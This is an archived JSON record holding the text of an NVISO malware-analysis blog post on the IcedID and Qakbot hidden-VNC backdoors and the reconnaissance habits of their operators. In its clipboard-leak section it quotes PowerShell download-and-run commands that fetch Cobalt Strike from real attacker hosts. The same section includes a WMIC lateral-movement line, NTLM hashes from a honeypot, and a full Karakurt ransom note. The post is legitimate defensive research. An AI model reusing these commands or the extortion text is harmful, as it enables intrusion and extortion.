{
	"id": "c5211d45-8d87-4bf0-86cd-e069f7364846",
	"created_at": "2026-04-10T03:21:13.267794Z",
	"updated_at": "2026-04-10T03:22:16.959332Z",
	"deleted_at": null,
	"sha1_hash": "6e2153d0a7c4ce6751cc64abb8efd8ab1744e555",
	"title": "IcedID \u0026 Qakbot's VNC Backdoors: Dark Cat, Anubis \u0026 Keyhole",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3633963,
	"plain_text": "IcedID \u0026 Qakbot's VNC Backdoors: Dark Cat, Anubis \u0026 Keyhole\r\nBy Maxime Thiebaut\r\nPublished: 2023-03-20 · Archived: 2026-04-10 02:40:47 UTC\r\nIcedID (a.k.a. BokBot) is a popular Trojan who first emerged in 2017 as an Emotet delivery. Originally described as a\r\nbanking Trojan, IcedID shifted its focus to embrace the extortion/ransom trend and nowadays acts as an initial access broker\r\nmostly delivered through malspam campaigns. Over the last few years, IcedID has commonly been seen delivering Cobalt\r\nStrike prior to a multitude of ransomware strains such as Conti or REvil.\r\nIcedID itself is composed of multiple modules, one of which is a poorly documented VNC backdoor (Virtual Network\r\nComputing) acting as a cross-platform remote desktop solution. Existence of this module (branded “HDESK” or “HDESK\r\nbot”) is just partially mentioned by Malwarebytes (2017) and Kaspersky (2021) while its usage has been widely observed\r\nand occasionally vulgarized as “Dark VNC”.\r\nAs part of our research efforts, NVISO has been analyzing IcedID and Qakbot’s command \u0026 control communications. In\r\nthis blog-post we will share insights into IcedID and Qakbot’s VNC backdoor(s) as seen from an attacker’s\r\nperspective, insights we obtained by extracting and reassembling VNC (RFC6143) traffic embedded within private and\r\npublic captures published by Brad Duncan.\r\nIn this post we introduce the three variants we observed as well as their capabilities: Dark Cat, Anubis and Keyhole. We’ll\r\nfollow by exposing common techniques employed by the operators before revealing information they leaked through their\r\nclipboard data.\r\nBokbot or Qakbot?\r\nThis research was originally titled “IcedID’s VNC Backdoors: Dark Cat, Anubis \u0026 Keyhole” and focused solely on IcedID\r\n(Bokbot). Brad however correctly pointed-out that Dark Cat is only leveraged by Qakbot, samples which were mistakenly\r\nincluded in this research after being confused with Bokbot (IcedID).\r\nIcedID and Qakbot VNC traffic remains extremely similar as can be observed in the following three VNC backdoors.\r\nHDESK Variants\r\nDuring our analysis of both public and private IcedID and Qakbot network captures, we identified 3 VNC backdoor variants,\r\nall part of the HDESK strain. These backdoors are typically activated during the final initial-access stages to initiate hands-on-keyboard activity. Supposedly short for “Hidden Desktop”, HDESK leverages Windows features allowing the backdoor\r\nto create a hidden desktop environment not visible to the compromised user. Within this hidden environment, the threat\r\nactors can start leveraging the user interface to perform regular tasks such as web browsing, reading mails in Outlook or\r\nexecuting commands through the Command Prompt and PowerShell.\r\nWe believe with medium confidence that these backdoors share origins as the the Dark Cat interface (used by Qakbot) has\r\ntraits that can later be found within Anubis and Keyhole interfaces (used by IcedID).\r\nThe “Dark Cat VNC” variant was first observed in November 2021 and is believed to be the named releases v1.1.2 and\r\nv1.1.3 used by Qakbot. Its usage was still extensively observed by the end of 2022. Upon initial access, the home screen\r\npresents the operator with multiple options to create new sessions alongside backdoor metrics such as idle time or lock state.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 1 of 11\n\nFigure 1: The Dark Cat VNC interface.\r\nUser Session\r\nThe USER session exists in three variations ( read , standard and black ) which allows the operator to switch the VNC\r\nview to the user’s visible desktop.\r\nHDESK Session\r\nThe HDESK session exists in three variations as well: standard, Tmp and NM (also called bot ). This session type causes\r\nthe backdoor to create a new hidden desktop not visible to the compromised user.\r\nBased on the activity we observed, the HDESK sessions are (understandably) preferred by the operators.\r\nAs HDESK sessions by default do not benefit from Windows’s built-in UI, operators are presented with an alternative start-menu to launch common programs. In Dark Cat these are Chrome, Firefox, Internet Explorer, Outlook, Command Prompt,\r\nRun and the Task Manager. A Windows Shell button is also foreseen which we believe, if used, will spawn the regular\r\nWindows UI most of the users are used to. Starting with Dark Cat v1.1.3 Edge Chromium furthermore joins the list of\r\navailable software.\r\nFigure 4: The Dark Cat HDESK session interface.\r\nBesides the alternate start-menu, operators can access some settings using the top-left orange icon which includes:\r\nDefining the hidden windows’ sizes.\r\nDefining the Chrome profile to use (lite or not).\r\nDeleting the browser’s profile(s).\r\nKilling the child process(es).\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 2 of 11\n\nFigure 5: The Dark Cat HDESK settings interface.\r\nWebCam Session\r\nThe WebCam sessions exist in three variations. While we were unable to capture its usage (honeypots lack webcams and\r\noperators do not attempt to use this session kind), its presence suggests IcedID’s VNC backdoors are capable of capturing\r\ncompromised devices’ webcam feeds.\r\nAnubis VNC\r\nThe “Anubis VNC” variant was first observed in January 2022 and is believed to be the named release v1.2.0 used by\r\nIcedID. Its usage was last observed in Q3 2022. No capability differences were observed between Anubis and Dark Cat\r\nv1.1.3 .\r\nFigure 6: The Anubis VNC interface.\r\nKEYHOLE VNC\r\nThe “KEYHOLE VNC” variant was first observed in October 2022 and is believed to be the named releases v1.3 as well\r\nas v2.1 . Its usage was observed as recently as Q1 2023.\r\nGrayscale\r\nThe first major change observed within Keyhole is its new color palette capability where operators can pick regular RGB\r\n(a.k.a. colored) or Grayscaled (a.k.a. black \u0026 white) feeds. The actual intend of this feature is unclear as, at least from a\r\nnetwork perspective, both RGB and Grayscale consume as many bytes per pixel, resulting in equal performances.\r\nFigure 7: The Keyhole color palette selector.\r\nHDESK Sessions\r\nKeyhole v1.3 provides a refreshed start-menu where icons have been updated and options renamed; The once cryptic Win\r\nShell option has been rebranded to the My Computer option.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 3 of 11\n\nFigure 8: The Keyhole ( v1.3 ) HDESK session interface in gray-scaled color palette.\r\nLater-on, with v2.1 , Keyhole renamed additional options and introduced the PowerShell and Desktop options. We\r\nassess with low confidence that the Desktop option only differs from the My Computer option by rendering the\r\nbackground as well, whereas the latter option was only seen generating desktop views without background image.\r\nFigure 9: The Keyhole ( v2.1 ) HDESK session interface.\r\nModus Operandi\r\nObtaining recordings of threat actors operating is useful to understand which technical capabilities they are equipped with,\r\nbut also allows the identification of TTPs (Tactics, Techniques \u0026 Procedures) they might employ. In the following section\r\nwe will review some of the most re-occurring actions we observed IcedID and Qakbot operators perform through the above\r\ndescribed backdoors.\r\n🍯 Nothing confidential here…\r\nAll media published within this section were reconstructed from publicly published artifacts. As all information is public, we\r\nhave refrained from redacting otherwise sensitive details such as company names and accounts.\r\nTask Manager\r\nTo no surprise, the usage of the Task Manager to identify running software was extremely common. While hard to detect as\r\noperators did not attempt to interfere with security software, the usage of this graphical utility outlined one interesting\r\ndrawback. On multiple (non-published) occasions we observed actors identifying known security tooling based on the\r\nprocess icon whereas other icon-less tooling blended in with many of Windows’ icon-less applications.\r\nFigure 10: An Anubis operator performing interactive reconnaissance through the Task Manager.\r\nOutlook\r\nAnother quite common technique was the inspection of Outlook, most likely to identify poorly-populated honeypot\r\nnetworks. As was the case for the Task Manager, the graphical usage of Outlook by the operator is indistinguishable from\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 4 of 11\n\nregular user activity. From the available recordings, no attempts were made to use Outlook for further phishing/spam.\r\nFigure 11: An Dark Cat operator performing interactive reconnaissance through Outlook.\r\nFigure 12: A Dark Cat operator inspecting Outlook’s “Rules and Alerts” settings.\r\nOn one singular instance, we observed the actor expressing interests in Outlook’s rules. The backdoor session was however\r\nterminated before they undertook any actions making it unclear whether this was part of the reconnaissance activities or\r\nwere planning to set up malicious email redirection rules.\r\nWeb Browsers\r\nFrom the available browsers, Edge and Chrome were the favorites. Using these, operators commonly validated the browser’s\r\nconnectivity by accessing Amazon.\r\nDuring one intrusion, the operator went as far as attempting to access the compromised user’s Amazon payment information.\r\nThis attempt is a good reminder that beyond a user’s corporate identity, personal accounts are definitely at risk as well.\r\nFigure 13: A Dark Cat operator accessing Amazon’s “Your Payments” account page.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 5 of 11\n\nFigure 14: A Keyhole operator inspecting Edge’s version details.\r\nOn some occasions operators accessed the edge://version URL. While this page exposes mostly useless information to\r\nattackers, the capture provides a sheer amount of uncommon flags usable for threat hunting.\r\nNoteworthy is the Profile path located within the user’s temporary directory and passed using the --user-data-dir=\r\nflag, a pattern that from our available telemetry seems quite uncommon for msedge.exe in enterprise environments. The\r\npattern is however occasionally used for applications such as opera_autoupdate.exe and msedgewebview2.exe .\r\nAlso worth noting is the usage of edge://settings/passwords to identify additional accounts.\r\nFigure 14: A Keyhole operator interactively inspecting Edge’s stored passwords.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 6 of 11\n\nFigure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat\r\nsession.\r\nA final commonly observed pattern is the usage of the unsupported --no-sandbox command-line flag in Edge resulting in a\r\nnotification banner. From our available telemetry in enterprise environments, the usage of this flag for Edge is uncommon,\r\nas opposed to Electron-based applications (including Microsoft Teams and WhatsApp) who extensively use it.\r\nExplorer\r\nAnother commonly observed utility to inspect the compromised devices’ files and folders, including payloads dropped\r\nthrough other channels, is Windows Explorer. As was the case with Outlook, Explorer’s usage is indistinguishable from\r\nlegitimate use making it a hard to detect technique.\r\nFigure 16: A Keyhole operator interactively using Explorer to inspect folders.\r\nCommand Prompt\r\nLast but not least, the command prompt was obviously used extensively. Usage of the command prompt is commonly\r\nleveraged for reconnaissance activities, including the usage of:\r\nwhoami /upn for system user discovery (T1033).\r\nipconfig for system network configuration discovery (T1016).\r\narp -a for both remote system discovery (T1018) and device identification based on the MAC address.\r\ndir for file and directory discovery (T1083) over SMB (T1021.002).\r\nnltest /dclist for the remote discovery of the domain controllers (T1018).\r\nping for network connectivity tests to remote systems (T1018).\r\nPowerShell (T1059.001) to deploy Cobalt Strike.\r\nAs opposed to the previous mostly passive TTPs, the active usage of the Command Prompt and PowerShell is often where\r\ndetection rules obtain a competing chance.\r\nFigure 17: An Anubis operator performing initial reconnaissance using the Command Prompt in an HDESK\r\nsession.\r\nClipboard Leaks\r\nAs VNC acts as a remote desktop solution, another trove of data was found within the clipboard synchronization feature. By\r\ncopy/pasting between victim and attacker machines, operators exposed some additional TTPs and information surrounding\r\ntheir operations.\r\nIn this section we will expose the most common and interesting data found within their clipboards.\r\nCobalt Strike\r\nAs expected, many variations of Cobalt Strike downloaders were observed. These leveraged both IPs and domain names, as\r\nwell as standard and non-standard ports such as HTTP on port 443 or HTTPS on port 8080 .\r\n1\r\n2\r\n3\r\n4\r\nIEX (( new-object net.webclient).downloadstring( 'http://89.163.251.143:80/a' ))\r\nIEX (( new-object net.webclient).downloadstring( 'http://146.0.72.85:443/waw' ))\r\nIEX (( new-object net.webclient).downloadstring( 'https://searcher.host/a80lvl' ))\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))\"\r\nIn some cases, the operators directly leveraged PowerShell shellcode stagers as shown in the following trimmed command.\r\n1 powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA...AGQAKAApADsA\r\nFor compromised accounts with sufficient access, WMIC commands were further issued to deploy Cobalt Strike on remote\r\nappliances.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 7 of 11\n\n1\r\nC:\\Windows\\System32\\wbem\\wmic.exe /node :10.6.21.140 process call create \"cmd.exe /c\r\npowershell.exe -nop -w hidden -c \" \"IEX ((new-object\r\nnet.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))\" \"\"\r\nFinally, although we were unable to identify which tooling would rely on such a format, actors leaked what appears to be a\r\nnaming convention.\r\n1\r\n2\r\n3\r\nplugin_cobalt_126_8888\r\nplugin_cobalt_126_8080\r\nplugin_cobalt_126_443\r\nRundll32\r\nBesides Cobalt Strike, operators exposed a DllRegisterServer command which Unit 42 observed being used with\r\nrundll32.exe and attributed to the deployment of a VNC backdoor.\r\n1\r\nDllRegisterServer --id %id% --group %group% --ip\r\n87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.\r\nNTLM Hashes\r\nAnother interesting finding was the presence of NTLM hashes within the clipboard data, exposing the compromise’s scope.\r\nIn this case, the impacted organization was part of a honeypot environment.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nDESKTOP-4GDQQL7\\admin 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\Administrator 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\bennie.mcbride 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\brenda.richardson 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY\\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\saul.underwood 4081e42481a5986e9bfcb7000bbe98f4\r\nDESKTOP-4GDQQL7\\WDAGUtilityAccount 7cd5fddee0cd00dde47014fe7f52faa4\r\nTECHHIGHWAY-DC\\krbtgt a7b565c147b69380d0b35f37ce478a1c\r\nAttacker Notes\r\nWhile the above findings do not aid attribution, one operator did leak their intrusion notes. Within these notes (“ [...] ”\r\ntrimmed for readability) we can observe Russian annotations, commonly related to CIS-based crime groups, as well\r\ninformation on then-ongoing breaches. A couple of days after the network traffic was taken, two non-honeypot companies\r\nmentioned within these notes were listed on the Black Basta ransomware group’s leak site.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n[...]\r\nHostname CTYMNGR1 =ist ne v domene\r\nHostname PCCXCNAU001 (4)-no ad/da/error\r\nHostname W10EQZAFI10027 -?ff ne prishla\r\nHostname NPD104 -24 host (7)\r\nHostname DESKTOP-3R921OV -small\r\n[...]\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 8 of 11\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nHostname CAS-TAB0010 [...] 28m 9prosto) yshla v off/sdelal zakrep MSNDevices?\r\nHostname PC-REC-LEFT-10 --???? ? ?? ????\r\nHostname TRAINING - w craneserviceco.com 20m (???) razobral\r\n[...]\r\nHostname RM6988 msystemscompany.com 32m (??????) ?????????? ? ???? ?? ?????????? ???????? + ????????\r\n???????\r\nHostname EXIRP316151 ?????? ?? ????? ???????\r\nHostname ADMIN201 ???? ? ???\r\n[...]\r\nHostname ODSCHEDULING [...] 12m work7---yshla v off\r\nHostname MDC1104 [...] 11m istok razobral\r\nRansom Notes\r\nAnother recovered artifact was a full ransom note where authors identified themselves as belonging to the Karakurt Team.\r\nWhile this note did not allow for the identification of its victim, it is further evidence of IcedID and Qakbot’s role within the\r\naccess broker ecosystem.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\nOk, you are reading this - so it means that we have your attention.\r\nHere's the deal :\r\n1. We breached your internal network and took control over all of your systems.\r\n2. We analyzed and located each piece of more-or-less important files while spending weeks inside.\r\n3. We exfiltrated anything we wanted (the total size of taken data exceeds 372 GB).\r\nFAQ:\r\n- Who the hell are you?\r\n- The Karakurt Team. Pretty skilled hackers I guess.\r\n- WHY ARE YOU DOING THIS?!??\r\n- Our motivation is purely financial.\r\n- We are going to report this to law enforcement.\r\n- You surely can, but be ready that they will confiscate most of your IT infrastructure, and even if\r\nyou will later change your mind and decide to pay - they will not let you.\r\n- Who else already knows about the breach?\r\n- Only You, who received the same message the same way. Nobody else. For now.\r\n- What if I tell you that I do not care and going to ignore this incident.\r\n- That's a very bad choice. If you will not contact us in a timely manner (by 07.01.2022) we will\r\nstart notifying your employees, clients, partners, subcontractors and any other persons that should\r\nknow how you treat your own corporate secrets and theirs.\r\n- What if I will not contact you even after it?\r\n- Than we shall move forward and start contacting your business competitors and list of anonymous\r\ninside traders we deal with, to find out if they are going to pay us for your data. When the list of\r\nthe people who is interested in such data is formed - the closed online auction starts.\r\n- None will buy what you took! I do not believe you!\r\n- If the auction fails - we will just leak everything online, making sure that this leak goes\r\nstraight to the press. We will make sure that your business will bleed by using any power we have in\r\nour posession, both social and technical.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 9 of 11\n\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n- What happens if I pay?\r\n- Nothing bad will happen.\r\nWe will remove everything we took from your network and leave you be.\r\nWe will provide the confirmation that the data is deleted.\r\nWe will help you to close technical vulnerabilities you have and provide some insight on how to avoid\r\nsuch incidents if some other perpetrator is interested in you.\r\nWe will never tell anybody about it.\r\n- We understand. We are ready to move forward.\r\n- You will find the Access Code at the end of this file, you will need this one to get in contact\r\nwith us for further instructions\r\nTo contact us using this ID you should do the following :\r\n1. Download Tor browser - https://www.torproject.org and install it.\r\n2. Open link in TOR browser - https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion\r\n3. Insert Access Code 70fdca335aa3fd45a182f39b2592a5d0 inside the field on the page and click Enter.\r\n4. The chat window will open and we will be able to communicate through a secured channel.\r\nThis link is available via \"Tor Browser\" only!\r\nAs a gesture of goodwill, we are ready to give you another leak - it is exclusive and fresh as well.\r\nJust let us know if you are interested in cooperation.\r\nKey Takeaways\r\nWhile it may not be complex to detect IcedID or Qakbot itself (any modern EDR should detect the rundll32.exe abuse),\r\ndistinguishing which interactive actions were taken through a VNC backdoor does pose challenges. Focus is often put on\r\ncommand-based executions without considering what could otherwise be considered legitimate user processes such as web\r\nbrowsers or Outlook. Understanding how these backdoors operate improve responsive and forensic capabilities by, for\r\nexample, allowing the identification and explanation of Edge processes with unlikely or unsupported flags.\r\nThis blog post further outlined the capability of network-level visibility which, for complex or BYOD (Bring Your Own\r\nDevice) environments, may cope with the lack of endpoint visibility. Within this spirit, we would like to outline the\r\neffectiveness of the Snort IDS rules published by Networkforensic with regards to the detection of IcedID command \u0026\r\ncontrol communications.\r\nIf you are facing challenges keeping your environment clean or need help due to a compromise, do not hesitate to reach out;\r\nNVISO can help!\r\nMaxime Thiebaut\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 10 of 11\n\nMaxime Thiebaut is a GCFA-certified researcher within NVISO Labs. He spends most of his time performing defensive\r\nresearch and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding\r\ncapabilities, Maxime enjoys reverse engineering samples observed in the wild.\r\nSource: https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/"
	],
	"report_names": [
		"icedids-vnc-backdoors-dark-cat-anubis-keyhole"
	],
	"threat_actors": [],
	"ts_created_at": 1775791273,
	"ts_updated_at": 1775791336,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6e2153d0a7c4ce6751cc64abb8efd8ab1744e555.pdf",
		"text": "https://archive.orkl.eu/6e2153d0a7c4ce6751cc64abb8efd8ab1744e555.txt",
		"img": "https://archive.orkl.eu/6e2153d0a7c4ce6751cc64abb8efd8ab1744e555.jpg"
	}
}